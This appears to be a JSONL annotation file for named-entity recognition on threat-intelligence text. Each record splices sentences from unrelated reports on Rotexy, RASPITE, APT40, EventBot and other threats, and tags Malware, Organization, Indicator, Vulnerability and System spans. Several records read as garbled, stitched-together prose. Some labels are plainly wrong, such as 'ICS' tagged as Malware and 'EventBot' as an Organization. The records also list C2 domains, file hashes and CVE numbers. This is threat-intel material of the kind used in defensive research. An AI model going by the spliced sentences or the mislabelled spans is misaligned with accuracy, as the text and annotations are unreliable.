{"text": "Displaying HTML pages We \u2019 ll now look at the HTML pages that Rotexy displays and the actions performed with them . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors . Analysis of RASPITE tactics , techniques , and procedures ( TTPs ) indicate the group has been active in some form since early - to mid-2017 .", "spans": [{"start": 62, "end": 68, "label": "Malware"}, {"start": 120, "end": 129, "label": "Malware"}, {"start": 213, "end": 226, "label": "Vulnerability"}, {"start": 282, "end": 312, "label": "Vulnerability"}, {"start": 369, "end": 376, "label": "Organization"}]}
{"text": "The Trojan displays a fake HTML update page ( update.html ) that blocks the device \u2019 s screen for a long period of time . Even an experienced user can be fooled by downloading a malicious file that is apparently from adobe.com , since the URL and the IP address correspond to Adobe 's legitimate infrastructure . RASPITE targeting includes entities in the US , Middle East , Europe , and East Asia .", "spans": [{"start": 46, "end": 57, "label": "Indicator"}, {"start": 178, "end": 192, "label": "Malware"}, {"start": 313, "end": 320, "label": "Organization"}]}
{"text": "The Trojan displays the extortion page ( extortionist.html ) that blocks the device and demands a ransom for unblocking it . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file . RASPITE overlaps significantly with Symantec 's Leafminer , which recently released a report on the group 's activity in the Middle East .", "spans": [{"start": 41, "end": 58, "label": "Indicator"}, {"start": 138, "end": 144, "label": "Organization"}, {"start": 147, "end": 151, "label": "Organization"}, {"start": 207, "end": 210, "label": "System"}, {"start": 215, "end": 218, "label": "System"}, {"start": 295, "end": 303, "label": "Malware"}, {"start": 306, "end": 313, "label": "Organization"}, {"start": 342, "end": 350, "label": "Organization"}, {"start": 354, "end": 363, "label": "Organization"}]}
{"text": "The sexually explicit images in this screenshot have been covered with a black box . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using hxxp://voguextra.com/decoy.doc . RASPITE 's activity to date currently focuses on initial access operations within the electric utility sector .", "spans": [{"start": 85, "end": 95, "label": "Organization"}, {"start": 164, "end": 179, "label": "Malware"}, {"start": 217, "end": 247, "label": "Malware"}, {"start": 250, "end": 257, "label": "Organization"}, {"start": 336, "end": 359, "label": "Organization"}]}
{"text": "The Trojan displays a phishing page ( bank.html ) prompting the user to enter their bank card details . We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post . This means that the Leafminer group is targeting electric utilities .", "spans": [{"start": 38, "end": 47, "label": "Indicator"}, {"start": 177, "end": 184, "label": "Organization"}, {"start": 200, "end": 219, "label": "Malware"}, {"start": 339, "end": 354, "label": "Organization"}, {"start": 368, "end": 386, "label": "Organization"}]}
{"text": "This page mimics a legitimate bank form and blocks the device screen until the user enters all the information . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" . While the group has not yet demonstrated an ICS capability , RASPITE 's recent targeting focus and methodology are clear indicators of necessary activity for initial intrusion operations into an IT network to prepare the ACT for later potential ICS events .", "spans": [{"start": 146, "end": 155, "label": "Organization"}, {"start": 207, "end": 213, "label": "Organization"}, {"start": 252, "end": 269, "label": "Malware"}, {"start": 318, "end": 321, "label": "Malware"}, {"start": 335, "end": 342, "label": "Organization"}, {"start": 469, "end": 471, "label": "Organization"}, {"start": 519, "end": 522, "label": "Malware"}]}
{"text": "It even has its own virtual keyboard that supposedly protects the victim from keyloggers . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . Active since at least 2014 , this actor has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe .", "spans": [{"start": 91, "end": 101, "label": "Malware"}, {"start": 161, "end": 183, "label": "Malware"}, {"start": 188, "end": 213, "label": "Malware"}, {"start": 287, "end": 292, "label": "Organization"}, {"start": 323, "end": 342, "label": "Organization"}, {"start": 345, "end": 370, "label": "Organization"}, {"start": 388, "end": 409, "label": "Organization"}]}
{"text": "In the areas marked \u2018 { text } \u2019 Rotexy displays the text it receives from the C & C . Like PLEAD , Shrouded Crossbow uses spear-phishing emails with backdoor-laden attachments that utilize the RTLO technique and accompanied by decoy documents . Active since at least 2014 , the Leviathan has long-standing interest in maritime industries , naval defense contractors , and associated research institutions in the United States and Western Europe .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 194, "end": 208, "label": "System"}, {"start": 228, "end": 243, "label": "Malware"}, {"start": 279, "end": 288, "label": "Organization"}, {"start": 319, "end": 338, "label": "Organization"}, {"start": 341, "end": 366, "label": "Organization"}, {"start": 384, "end": 405, "label": "Organization"}]}
{"text": "Typically , it is a message saying that the user has received a money transfer , and that they must enter their bank card details so the money can be transferred to their account . The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable . On September 15 and 19 , 2017 , Proofpoint detected and blocked spearphishing emails from this group targeting a US shipbuilding company and a US university research center with military ties .", "spans": [{"start": 185, "end": 204, "label": "System"}, {"start": 266, "end": 276, "label": "Malware"}, {"start": 294, "end": 304, "label": "Malware"}, {"start": 401, "end": 411, "label": "Organization"}, {"start": 447, "end": 453, "label": "System"}, {"start": 485, "end": 505, "label": "Organization"}, {"start": 547, "end": 555, "label": "Organization"}]}
{"text": "The entered data is then checked and the last four digits of the bank card number are also checked against the data sent in the C & C command . Leader is Bookworm 's main module and controls all of the activities of the Trojan , but relies on the additional DLLs to provide specific functionality . The attachments exploited CVE-2017-8759 which was discovered and documented only five days prior to the campaign .", "spans": [{"start": 144, "end": 150, "label": "System"}, {"start": 154, "end": 162, "label": "System"}, {"start": 258, "end": 262, "label": "Malware"}, {"start": 325, "end": 338, "label": "Vulnerability"}]}
{"text": "The following scenario may play out : according to the templates for processing incoming SMSs , Rotexy intercepts a message from the bank that contains the last four digits of the bank card connected to the phone number . We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" . Some of the documents exploited CVE-2017-0199 to deliver the payload .", "spans": [{"start": 96, "end": 102, "label": "Malware"}, {"start": 265, "end": 273, "label": "System"}, {"start": 360, "end": 376, "label": "Malware"}, {"start": 405, "end": 423, "label": "System"}, {"start": 516, "end": 525, "label": "Indicator"}, {"start": 536, "end": 549, "label": "Vulnerability"}]}
{"text": "The Trojan sends these digits to the C & C , which in turn sends a command to display a fake data entry window to check the four digits . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . Between August 2 and 4 , the actor sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors .", "spans": [{"start": 164, "end": 185, "label": "Malware"}, {"start": 196, "end": 211, "label": "System"}, {"start": 217, "end": 233, "label": "Malware"}, {"start": 265, "end": 270, "label": "Organization"}, {"start": 299, "end": 305, "label": "System"}, {"start": 365, "end": 384, "label": "Organization"}]}
{"text": "If the user has provided the details of another card , then the following window is displayed : The application leaves the user with almost no option but to enter the correct card number , as it checks the entered number against the bank card details the cybercriminals received earlier . Due to these changes without a new date string , we believe the date codes are used for campaign tracking rather than a Bookworm build identifier . Between August 2 and 4 , the Leviathan sent targeted spearphishing emails containing malicious URLs linking to documents to multiple defense contractors .", "spans": [{"start": 324, "end": 335, "label": "Malware"}, {"start": 353, "end": 363, "label": "Malware"}, {"start": 377, "end": 394, "label": "Malware"}, {"start": 409, "end": 417, "label": "System"}, {"start": 466, "end": 475, "label": "Organization"}, {"start": 504, "end": 510, "label": "System"}, {"start": 570, "end": 589, "label": "Organization"}]}
{"text": "When all the necessary card details are entered and have been checked , all the information is uploaded to the C & C . Another decoy slideshow associated with the Bookworm attack campaign contains photos of an event called Bike for Dad 2015 . The Leviathan also occasionally used macro-laden Microsoft Word documents to target other US research and development organizations during this period .", "spans": [{"start": 127, "end": 142, "label": "Malware"}, {"start": 247, "end": 256, "label": "Organization"}, {"start": 280, "end": 316, "label": "Indicator"}, {"start": 349, "end": 374, "label": "Organization"}]}
{"text": "How to unblock the phone Now for some good news : Rotexy doesn \u2019 t have a very well-designed module for processing commands that arrive in SMSs . If the document was delivered with macros instead of exploits ( CVE-2012-0158 , CVE-2013-3906 or CVE-2014-1761 ) , then the document contained instructions for enabling macros . The period between November 2014 and January 2015 marked one of the earlier instances in which Proofpoint observed persistent exploitation attempts by this actor .", "spans": [{"start": 50, "end": 56, "label": "Malware"}, {"start": 153, "end": 161, "label": "Malware"}, {"start": 210, "end": 223, "label": "Vulnerability"}, {"start": 226, "end": 239, "label": "Vulnerability"}, {"start": 243, "end": 256, "label": "Vulnerability"}, {"start": 419, "end": 429, "label": "Organization"}, {"start": 480, "end": 485, "label": "Organization"}]}
{"text": "It means the phone can be unblocked in some cases when it has been blocked by one of the above HTML pages . The executable would install the real Ammyy product , but would also launch a file called either AmmyyService.exe or AmmyySvc.exe which contained the malicious payload . The Leviathan , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 .", "spans": [{"start": 205, "end": 221, "label": "Malware"}, {"start": 225, "end": 237, "label": "Malware"}, {"start": 282, "end": 291, "label": "Organization"}, {"start": 382, "end": 390, "label": "Organization"}]}
{"text": "This is done by sending \u201c 3458 \u201d in an SMS to the blocked device \u2013 this will revoke the administrator privileges from the Trojan . The second , aptly titled \" kontrakt87.doc \" , copies a generic telecommunications service contract from MegaFon , a large Russian mobile phone operator . This actor , whose espionage activities primarily focus on targets in the US and Western Europe with military ties , has been active since at least 2014 .", "spans": [{"start": 159, "end": 173, "label": "Malware"}, {"start": 195, "end": 221, "label": "Organization"}, {"start": 236, "end": 243, "label": "Organization"}, {"start": 262, "end": 283, "label": "Organization"}, {"start": 291, "end": 296, "label": "Organization"}, {"start": 387, "end": 395, "label": "Organization"}]}
{"text": "After that it \u2019 s necessary to send \u201c stop_blocker \u201d to the same number \u2013 this will disable the display of HTML pages that extort money and block the screen . In addition to built-in functionalities , the operators of Careto can upload additional modules which can perform any malicious task . The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013 , dubbed TEMP.Periscope .", "spans": [{"start": 218, "end": 224, "label": "Malware"}, {"start": 229, "end": 254, "label": "Malware"}, {"start": 349, "end": 371, "label": "Organization"}, {"start": 408, "end": 422, "label": "Organization"}]}
{"text": "Rotexy may start requesting device administrator privileges again in an infinite loop ; in that case , restart the device in safe mode and remove the malicious program . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website . The Leviathan generally emailed Microsoft Excel documents with malicious macros to US universities with military interests , most frequently related to the Navy .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 170, "end": 176, "label": "Malware"}, {"start": 281, "end": 290, "label": "Organization"}, {"start": 363, "end": 375, "label": "Organization"}, {"start": 381, "end": 389, "label": "Organization"}, {"start": 433, "end": 437, "label": "Organization"}]}
{"text": "However , this method may not work if the threat actors react quickly to an attempt to remove the Trojan . Sometimes , the attackers use sub-domains on the exploit websites , to make them seem more legitimate . The current campaign is a sharp escalation of detected activity since summer 2017 .", "spans": [{"start": 137, "end": 148, "label": "System"}]}
{"text": "In that case , you first need to send the text \u201c 393838 \u201d in an SMS to the infected device and then repeat all the actions described above ; that text message will change the C & C address to \u201c : // \u201d , so the phone will no longer receive commands from the real C & C . We initially became aware of Careto when we observed attempts to exploit a vulnerability in our products to make the malware \" invisible \" in the system . Since early 2018 , FireEye ( including our FireEye as a Service ( FaaS ) , Mandiant Consulting , and iSIGHT Intelligence teams ) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities , especially those connected to South China Sea issues .", "spans": [{"start": 299, "end": 305, "label": "Malware"}, {"start": 444, "end": 451, "label": "Organization"}, {"start": 468, "end": 475, "label": "Organization"}, {"start": 491, "end": 495, "label": "Organization"}, {"start": 500, "end": 519, "label": "Organization"}, {"start": 526, "end": 545, "label": "Organization"}, {"start": 612, "end": 623, "label": "Organization"}, {"start": 628, "end": 645, "label": "Organization"}]}
{"text": "Please note that these unblocking instructions are based on an analysis of the current version of Rotexy and have been tested on it . The scanner was identified as the Acunetix Web Vulnerability Scanner which is a commercial penetration testing tool that is readily available as a 14-day trial . Known targets of the Leviathan have been involved in the maritime industry , and research institutes , academic organizations , and private firms in the United States .", "spans": [{"start": 98, "end": 104, "label": "Malware"}, {"start": 168, "end": 202, "label": "Malware"}, {"start": 317, "end": 326, "label": "Organization"}, {"start": 353, "end": 370, "label": "Organization"}, {"start": 377, "end": 396, "label": "Organization"}, {"start": 399, "end": 421, "label": "Organization"}, {"start": 428, "end": 441, "label": "Organization"}]}
{"text": "However , it \u2019 s possible the set of commands may change in future versions of the Trojan . The decoy documents dropped suggest that the targets are likely to be politically or militarily motivated , with subjects such as Intelligence reports and political situations being used as lure documents . Active since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities .", "spans": [{"start": 96, "end": 111, "label": "Malware"}, {"start": 162, "end": 173, "label": "Organization"}, {"start": 177, "end": 187, "label": "Organization"}, {"start": 247, "end": 256, "label": "Organization"}, {"start": 328, "end": 342, "label": "Organization"}, {"start": 431, "end": 448, "label": "Organization"}, {"start": 451, "end": 459, "label": "Organization"}, {"start": 464, "end": 478, "label": "Organization"}, {"start": 481, "end": 494, "label": "Organization"}, {"start": 497, "end": 504, "label": "Organization"}, {"start": 507, "end": 525, "label": "Organization"}, {"start": 532, "end": 553, "label": "Organization"}]}
{"text": "Geography of Rotexy attacks According to our data , 98 % of all Rotexy attacks target users in Russia . Lately , Patchwork has been sending multiple RTF files exploiting CVE-2017-8570 . TEMP.Periscope overlaps in targeting , as well as tactics , techniques , and procedures ( TTPs ) , with TEMP.Jumper , a group that also overlaps significantly with public reporting on NanHaiShu .", "spans": [{"start": 13, "end": 19, "label": "Malware"}, {"start": 64, "end": 70, "label": "Malware"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 149, "end": 158, "label": "Malware"}, {"start": 170, "end": 183, "label": "Vulnerability"}, {"start": 186, "end": 200, "label": "Organization"}, {"start": 290, "end": 301, "label": "Organization"}, {"start": 370, "end": 379, "label": "Malware"}]}
{"text": "Indeed , the Trojan explicitly targets Russian-speaking users . The first of which we call ' CONFUCIUS_A ' , a malware family that has links to a series of attacks associated with a backdoor attack method commonly known as SNEEPY ( aka ByeByeShell ) first reported by Rapid7 in 2013 . The actor has conducted operations since at least 2013 in support of China 's naval modernization effort .", "spans": [{"start": 93, "end": 104, "label": "Malware"}, {"start": 223, "end": 229, "label": "System"}, {"start": 236, "end": 247, "label": "System"}, {"start": 268, "end": 274, "label": "Organization"}, {"start": 289, "end": 294, "label": "Organization"}]}
{"text": "There have also been cases of users in Ukraine , Germany , Turkey and several other countries being affected . At first glance CONFUCIUS_B looks very similar to CONFUCIUS_A , and they are also packaged in plain SFX binary files . FireEye is highlighting a Cyber Espionage operation targeting crucial technologies and traditional intelligence targets from a China-nexus state sponsored actor we call APT40 .", "spans": [{"start": 127, "end": 138, "label": "Malware"}, {"start": 161, "end": 172, "label": "Malware"}, {"start": 211, "end": 227, "label": "System"}, {"start": 230, "end": 237, "label": "Organization"}, {"start": 385, "end": 390, "label": "Organization"}, {"start": 399, "end": 404, "label": "Organization"}]}
{"text": "Kaspersky Internet Security for Android and the Sberbank Online app securely protect users against attacks by this Trojan . The CONFUCIUS_B executable is disguised as a PowerPoint presentation , using a Right-To-Left-Override ( RTLO ) trick and a false icon . The Leviathan group has specifically targeted engineering , transportation , and the defense industry , especially where these sectors overlap with maritime technologies .", "spans": [{"start": 0, "end": 27, "label": "System"}, {"start": 32, "end": 39, "label": "System"}, {"start": 48, "end": 67, "label": "System"}, {"start": 128, "end": 139, "label": "Malware"}, {"start": 154, "end": 192, "label": "Malware"}, {"start": 195, "end": 225, "label": "Malware"}, {"start": 228, "end": 232, "label": "System"}, {"start": 247, "end": 257, "label": "Malware"}, {"start": 264, "end": 279, "label": "Organization"}, {"start": 306, "end": 317, "label": "Organization"}, {"start": 320, "end": 334, "label": "Organization"}, {"start": 345, "end": 361, "label": "Organization"}]}
{"text": "IOCs SHA256 0ca09d4fde9e00c0987de44ae2ad51a01b3c4c2c11606fe8308a083805760ee7 4378f3680ff070a1316663880f47eba54510beaeb2d897e7bbb8d6b45de63f96 76c9d8226ce558c87c81236a9b95112b83c7b546863e29b88fec4dba5c720c0b 7cc2d8d43093c3767c7c73dc2b4daeb96f70a7c455299e0c7824b4210edd6386 We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover . We believe APT40 's emphasis on maritime issues and naval technology ultimately support China 's ambition to establish a blue-water navy .", "spans": [{"start": 12, "end": 76, "label": "Indicator"}, {"start": 77, "end": 141, "label": "Indicator"}, {"start": 142, "end": 206, "label": "Indicator"}, {"start": 207, "end": 271, "label": "Indicator"}, {"start": 419, "end": 437, "label": "System"}, {"start": 446, "end": 457, "label": "Malware"}, {"start": 479, "end": 487, "label": "System"}, {"start": 501, "end": 506, "label": "Organization"}, {"start": 542, "end": 558, "label": "Organization"}]}
{"text": "9b2fd7189395b2f34781b499f5cae10ec86aa7ab373fbdc2a14ec4597d4799ba ac216d502233ca0fe51ac2bb64cfaf553d906dc19b7da4c023fec39b000bc0d7 b1ccb5618925c8f0dda8d13efe4a1e1a93d1ceed9e26ec4a388229a28d1f8d5b ba4beb97f5d4ba33162f769f43ec8e7d1ae501acdade792a4a577cd6449e1a84 The two malware families themselves are also very similar , and therefore we think that the shared technique is an indication of a single developer , or development company , behind both CONFUCIUS_A and CONFUCIUS_B . Within a year APT40 was observed masquerading as a UUV manufacturer , and targeting universities engaged in naval research .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 130, "end": 194, "label": "Indicator"}, {"start": 195, "end": 259, "label": "Indicator"}, {"start": 413, "end": 432, "label": "Organization"}, {"start": 447, "end": 458, "label": "Malware"}, {"start": 463, "end": 474, "label": "Malware"}, {"start": 491, "end": 496, "label": "Organization"}, {"start": 561, "end": 573, "label": "Organization"}]}
{"text": "ba9f4d3f4eba3fa7dce726150fe402e37359a7f36c07f3932a92bd711436f88c e194268bf682d81fc7dc1e437c53c952ffae55a9d15a1fc020f0219527b7c2ec \u0421 & C 2014\u20132015 : secondby.ru darkclub.net holerole.org googleapis.link 2015\u20132016 : test2016.ru blackstar.pro synchronize.pw lineout.pw sync-weather.pw The Android version , for instance , can steal SMS messages , accounts , contacts , and files , as well as record audio . APT40 engages in broader regional targeting against traditional intelligence targets , especially organizations with operations in Southeast Asia .", "spans": [{"start": 0, "end": 64, "label": "Indicator"}, {"start": 65, "end": 129, "label": "Indicator"}, {"start": 148, "end": 159, "label": "Indicator"}, {"start": 160, "end": 172, "label": "Indicator"}, {"start": 173, "end": 185, "label": "Indicator"}, {"start": 186, "end": 201, "label": "Indicator"}, {"start": 214, "end": 225, "label": "Indicator"}, {"start": 226, "end": 239, "label": "Indicator"}, {"start": 240, "end": 254, "label": "Indicator"}, {"start": 255, "end": 265, "label": "Indicator"}, {"start": 266, "end": 281, "label": "Indicator"}, {"start": 286, "end": 301, "label": "Malware"}, {"start": 323, "end": 341, "label": "Malware"}, {"start": 344, "end": 352, "label": "Malware"}, {"start": 355, "end": 363, "label": "Malware"}, {"start": 370, "end": 375, "label": "Malware"}, {"start": 389, "end": 401, "label": "Malware"}, {"start": 404, "end": 409, "label": "Organization"}]}
{"text": "2016 freedns.website streamout.space 2017\u20132018 : streamout.space sky-sync.pw gms-service.info EventBot : A New Mobile Banking Trojan is Born April 30 , 2020 KEY FINDINGS The Cybereason Nocturnus team is investigating EventBot , a new type of Android mobile malware that emerged around March 2020 . The documents that exploit CVE2017-11882 download another payload \u2014 an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script \u2014 from the server , which is executed accordingly by the command-line tool mshta.exe . We assess with moderate confidence that APT40 is a state-sponsored Chinese Cyber Espionage operation .", "spans": [{"start": 21, "end": 36, "label": "Indicator"}, {"start": 49, "end": 64, "label": "Indicator"}, {"start": 65, "end": 76, "label": "Indicator"}, {"start": 77, "end": 93, "label": "Indicator"}, {"start": 94, "end": 102, "label": "Malware"}, {"start": 174, "end": 194, "label": "Organization"}, {"start": 217, "end": 225, "label": "Malware"}, {"start": 242, "end": 249, "label": "System"}, {"start": 325, "end": 338, "label": "Vulnerability"}, {"start": 369, "end": 385, "label": "System"}, {"start": 388, "end": 391, "label": "Malware"}, {"start": 521, "end": 530, "label": "Malware"}, {"start": 573, "end": 578, "label": "Organization"}]}
{"text": "EventBot is a mobile banking trojan and infostealer that abuses Android \u2019 s accessibility features to steal user data from financial applications , read user SMS messages , and steal SMS messages to allow the malware to bypass two-factor authentication . According to our statistics , as of the beginning of 2015 this botnet encompassed over 250 000 infected devices worldwide including infecting more than 100 financial institutions with 80% of them from the top 20 list . The actor 's targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 64, "end": 71, "label": "System"}, {"start": 318, "end": 336, "label": "Malware"}, {"start": 411, "end": 433, "label": "Organization"}, {"start": 478, "end": 483, "label": "Organization"}, {"start": 598, "end": 603, "label": "Organization"}]}
{"text": "EventBot targets users of over 200 different financial applications , including banking , money transfer services , and crypto-currency wallets . If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs . Analysis of the operational times of the group 's activities indicates that it is probably centered around China Standard TIME ( UTC +8 ) .", "spans": [{"start": 0, "end": 8, "label": "Malware"}, {"start": 151, "end": 154, "label": "Malware"}, {"start": 252, "end": 292, "label": "Malware"}]}
{"text": "Those targeted include applications like Paypal Business , Revolut , Barclays , UniCredit , CapitalOne UK , HSBC UK , Santander UK , TransferWise , Coinbase , paysafecard , and many more . At first look , it pretends to be a Java related application but after a quick analysis , it was obvious this was something more than just a simple Java file . APT40 relies heavily on web shells for an initial foothold into an organization .", "spans": [{"start": 41, "end": 56, "label": "System"}, {"start": 59, "end": 66, "label": "System"}, {"start": 69, "end": 77, "label": "System"}, {"start": 80, "end": 89, "label": "System"}, {"start": 92, "end": 105, "label": "System"}, {"start": 108, "end": 115, "label": "System"}, {"start": 118, "end": 130, "label": "System"}, {"start": 133, "end": 145, "label": "System"}, {"start": 148, "end": 156, "label": "System"}, {"start": 159, "end": 170, "label": "System"}, {"start": 225, "end": 249, "label": "System"}, {"start": 337, "end": 346, "label": "Malware"}, {"start": 349, "end": 354, "label": "Organization"}, {"start": 373, "end": 383, "label": "Malware"}]}
{"text": "It specifically targets financial banking applications across the United States and Europe , including Italy , the UK , Spain , Switzerland , France , and Germany . Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer . APT40 has been observed leveraging a variety of techniques for initial compromise , including web server exploitation , phishing campaigns delivering publicly available and custom backdoors , and strategic web compromises .", "spans": [{"start": 237, "end": 246, "label": "Malware"}, {"start": 405, "end": 410, "label": "Organization"}]}
{"text": "The full list of banking applications targeted is included in the appendix . The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . Depending on placement , a Web shell can provide continued access to victims ' environments , re-infect victim systems , and facilitate lateral movement .", "spans": [{"start": 183, "end": 194, "label": "System"}, {"start": 197, "end": 213, "label": "Malware"}, {"start": 220, "end": 234, "label": "System"}, {"start": 264, "end": 273, "label": "System"}]}
{"text": "EventBot is particularly interesting because it is in such early stages . The above network shows relationships between three tools used by Hidden Lynx during its VOHO campaign : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit . The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 179, "end": 190, "label": "System"}, {"start": 193, "end": 209, "label": "Malware"}, {"start": 216, "end": 230, "label": "System"}, {"start": 292, "end": 305, "label": "Vulnerability"}]}
{"text": "This brand new malware has real potential to become the next big mobile malware , as it is under constant iterative improvements , abuses a critical operating system feature , and targets financial applications . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx . A paper released today by our colleagues at Palo Alto Networks presented a portion of data on this crew under the label \" the Lotus Blossom Operation \" , likely named for the debug string present in much of the \" Elise \" codebase since at least 2012 : \" d:\\lstudio\\projects\\lotus\\\u2026 \" .", "spans": [{"start": 213, "end": 221, "label": "Organization"}, {"start": 285, "end": 296, "label": "System"}, {"start": 301, "end": 317, "label": "Malware"}, {"start": 336, "end": 342, "label": "System"}, {"start": 352, "end": 366, "label": "Organization"}, {"start": 376, "end": 387, "label": "Organization"}, {"start": 434, "end": 452, "label": "Organization"}, {"start": 603, "end": 608, "label": "Malware"}]}
{"text": "This research gives a rare look into the process improvements malware authors make when optimizing before launch . One e-mail carried a Microsoft PowerPoint file named \" thanks.pps \" ( VirusTotal ) , the other a Microsoft Word document named \" request.docx \" . Instead , the Spring Dragon group is known to have employed spearphish exploits , strategic web compromises , and watering holes attack .", "spans": [{"start": 136, "end": 161, "label": "Malware"}, {"start": 170, "end": 180, "label": "Malware"}, {"start": 212, "end": 235, "label": "Malware"}, {"start": 244, "end": 256, "label": "Malware"}, {"start": 275, "end": 294, "label": "Organization"}, {"start": 332, "end": 340, "label": "Vulnerability"}]}
{"text": "By going on the offensive and hunting the attackers , our team was able to unearth the early stages of what may be a very dangerous mobile malware . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit .", "spans": [{"start": 172, "end": 180, "label": "Organization"}, {"start": 218, "end": 231, "label": "Malware"}, {"start": 236, "end": 246, "label": "Malware"}, {"start": 289, "end": 302, "label": "Malware"}, {"start": 394, "end": 397, "label": "System"}, {"start": 398, "end": 406, "label": "Vulnerability"}, {"start": 409, "end": 427, "label": "System"}, {"start": 428, "end": 436, "label": "Vulnerability"}, {"start": 454, "end": 467, "label": "Vulnerability"}, {"start": 468, "end": 472, "label": "System"}, {"start": 473, "end": 481, "label": "Vulnerability"}, {"start": 528, "end": 541, "label": "Malware"}]}
{"text": "TABLE OF CONTENTS Security Recommendations Introduction Threat Analysis Common Features Unique Features by Version Malware Under Active Development Suspected Detection Tests by the Threat Actor EventBot Infrastructure Cybereason Mobile Conclusion Indicators of Compromise MITRE ATT & CK for Mobile Breakdown SECURITY RECOMMENDATIONS Keep your mobile device up-to-date with the latest software updates from legitimate sources . The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll . The Spring Dragon appears to have rolled out a steady mix of exploits against government-related organizations in VN , TW , PH , and other locations over the past few years .", "spans": [{"start": 194, "end": 202, "label": "Malware"}, {"start": 272, "end": 277, "label": "Organization"}, {"start": 452, "end": 462, "label": "Malware"}, {"start": 526, "end": 537, "label": "Malware"}, {"start": 570, "end": 581, "label": "Malware"}, {"start": 588, "end": 601, "label": "Organization"}, {"start": 662, "end": 694, "label": "Organization"}]}
{"text": "Keep Google Play Protect on . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 . Organizations located in Myanmar and targeted by Spring Dragon have gone unmentioned .", "spans": [{"start": 5, "end": 24, "label": "System"}, {"start": 79, "end": 88, "label": "Malware"}, {"start": 235, "end": 248, "label": "Organization"}]}
{"text": "Do not download mobile apps from unofficial or unauthorized sources . This next stage library copies itself into the System32 directory of the Windows folder after the hardcoded file name \u2014 either KBDLV2.DLL or AUTO.DLL , depending on the malware sample . Spring Dragon 's infiltration techniques there were not simply spearphish .", "spans": [{"start": 197, "end": 207, "label": "Malware"}, {"start": 211, "end": 219, "label": "Malware"}, {"start": 256, "end": 269, "label": "Organization"}]}
{"text": "Most legitimate Android apps are available on the Google Play Store . Once BARIUM has established rapport , they spear-phish the victim using a variety of unsophisticated malware installation vectors , including malicious shortcut ( .lnk ) files with hidden payloads , compiled HTML help ( .chm ) files , or Microsoft Office documents containing macros or exploits . The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) .", "spans": [{"start": 16, "end": 23, "label": "System"}, {"start": 50, "end": 67, "label": "System"}, {"start": 155, "end": 178, "label": "System"}, {"start": 212, "end": 230, "label": "System"}, {"start": 233, "end": 237, "label": "Malware"}, {"start": 278, "end": 302, "label": "System"}, {"start": 308, "end": 334, "label": "System"}, {"start": 391, "end": 412, "label": "Indicator"}, {"start": 436, "end": 445, "label": "Indicator"}, {"start": 506, "end": 511, "label": "Malware"}, {"start": 514, "end": 524, "label": "Indicator"}, {"start": 529, "end": 561, "label": "Indicator"}, {"start": 576, "end": 601, "label": "Malware"}]}
